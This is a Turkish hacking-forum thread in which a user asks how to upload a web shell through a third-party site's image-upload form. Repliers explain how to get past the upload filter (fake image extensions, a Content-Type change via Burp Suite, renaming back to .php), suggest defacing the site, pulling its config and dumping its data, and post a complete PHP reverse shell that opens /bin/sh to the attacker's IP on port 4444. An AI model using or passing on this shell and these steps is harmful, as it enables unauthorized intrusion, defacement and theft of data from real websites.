Nasıl shell atarım

[QuiXX]

hym06k5.png

ff

hizliresim.com

Elimde böyle bir site ve upload kısmı var nasıl shell basabilirim.





-İyi Forumlar-

 

['4KR3P]

dosya seç kısmına tıkla ve php shell dosyanı yükle. fakat dosya img uzantılı bir dosya isteyecek senden büyük ihtimal çünkü resim yükleme seçeneği var. bunun için shell uzantını sitenin istediği formatta girmelisin ve shellini yükle dedikten sonra shell yolunu kayıt etmelisin. ardından kaydettiğin shell yolundan shelle girdiğinde image dosyası şeklinde görüneceği için onun uzantısını tekrar php yapmalısın. sonrası senin hayal gücüne kalmış, indexte atabilirsin dosylardan configte çekebilirsin siteyi dumpta edebilirsin. takıldığın yerde yardımcı olurum tekrar ulaşman yeterli

 

[SaruH4N]

up.php veya up.html yani(upload)v shell varsa onu dene bazen siteler yiyebiliyor, ayrıyeten fotoğraf tarzında yapabilirsin ...php.jpg vs gibi
onun haricinde bir haber,konu vs açma kategorisi varsa upload shell'ini (html,php) kodlarını gösterilen alana girip ordan yükleyebilirsin. sitenin tabanını öğrenip buna göre payload exploit ve zaafiyet varsa yükleyebilirsin

 

[By 4lp3r3n]

dosya seç kısmına tıkla ve php shell dosyanı yükle. fakat dosya img uzantılı bir dosya isteyecek senden büyük ihtimal çünkü resim yükleme seçeneği var. bunun için shell uzantını sitenin istediği formatta girmelisin ve shellini yükle dedikten sonra shell yolunu kayıt etmelisin. ardından kaydettiğin shell yolundan shelle girdiğinde image dosyası şeklinde görüneceği için onun uzantısını tekrar php yapmalısın. sonrası senin hayal gücüne kalmış, indexte atabilirsin dosylardan configte çekebilirsin siteyi dumpta edebilirsin. takıldığın yerde yardımcı olurum tekrar ulaşman yeterli

İmage dosyası gibi gozukurden sonrasında değiştirirken urldenmi degistircez

 

[Will Graham]

buyrun: Web Console

burp suite ile araya girip Content-Type parametresinin değerini image/jpeg olarak değiştirdikten sonra web shell yedirebiliyoruz ancak çoğu shell tespit edildiği için kimse shell atamamış gibi araplar başka sitelerden index çektirmiş admin/plan sayfasına onları sildim

 

[QuiXX]

dosya seç kısmına tıkla ve php shell dosyanı yükle. fakat dosya img uzantılı bir dosya isteyecek senden büyük ihtimal çünkü resim yükleme seçeneği var. bunun için shell uzantını sitenin istediği formatta girmelisin ve shellini yükle dedikten sonra shell yolunu kayıt etmelisin. ardından kaydettiğin shell yolundan shelle girdiğinde image dosyası şeklinde görüneceği için onun uzantısını tekrar php yapmalısın. sonrası senin hayal gücüne kalmış, indexte atabilirsin dosylardan configte çekebilirsin siteyi dumpta edebilirsin. takıldığın yerde yardımcı olurum tekrar ulaşman yeterli

Shell dosyam yok.

 

[CapoDeiCapi]

Shell dosyam yok.

<?php

set_time_limit(0);
$VERSION = "1.0";
$ip = '127.0.0.1';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    
    if ($pid) {
        exit(0);
    }

    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w") 
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

İp ve port kısmını kendinize göre ayarlayınız

 

[QuiXX]

<?php

set_time_limit(0);
$VERSION = "1.0";
$ip = '127.0.0.1';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
   
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
   
    if ($pid) {
        exit(0);
    }

    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

İp ve port kısmını kendinize göre ayarlayınız

ip kendi ip adresim mi. Port ne olacak.

 

[CapoDeiCapi]

ip kendi ip adresim mi. Port ne olacak.

İp adresi kendi ip niz portu 4444 olarak veriniz